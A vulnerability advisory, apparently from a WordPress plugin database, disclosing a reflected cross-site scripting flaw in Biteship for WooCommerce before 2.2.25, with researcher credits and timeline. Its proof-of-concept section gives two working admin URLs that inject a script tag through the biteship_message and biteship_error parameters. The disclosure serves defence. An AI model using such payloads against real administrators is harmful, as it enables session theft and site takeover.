WordPress Plugin Vulnerabilities

Biteship for WooCommerce < 2.2.25 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the biteship_error and biteship_message parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open one of the URLs below:

https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_message=<script>alert(/XSS/)</script>

https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_error=<script>alert(/XSS/)</script>

Affects Plugins

Fixed in 2.2.25

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Enrico Marcolini, Claudio Marchesini
Submitter
Enrico Marcolini, Claudio Marchesini
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-11-17 (about 5 months ago)
Added
2024-01-03 (about 4 months ago)
Last Updated
2024-01-08 (about 4 months ago)

Other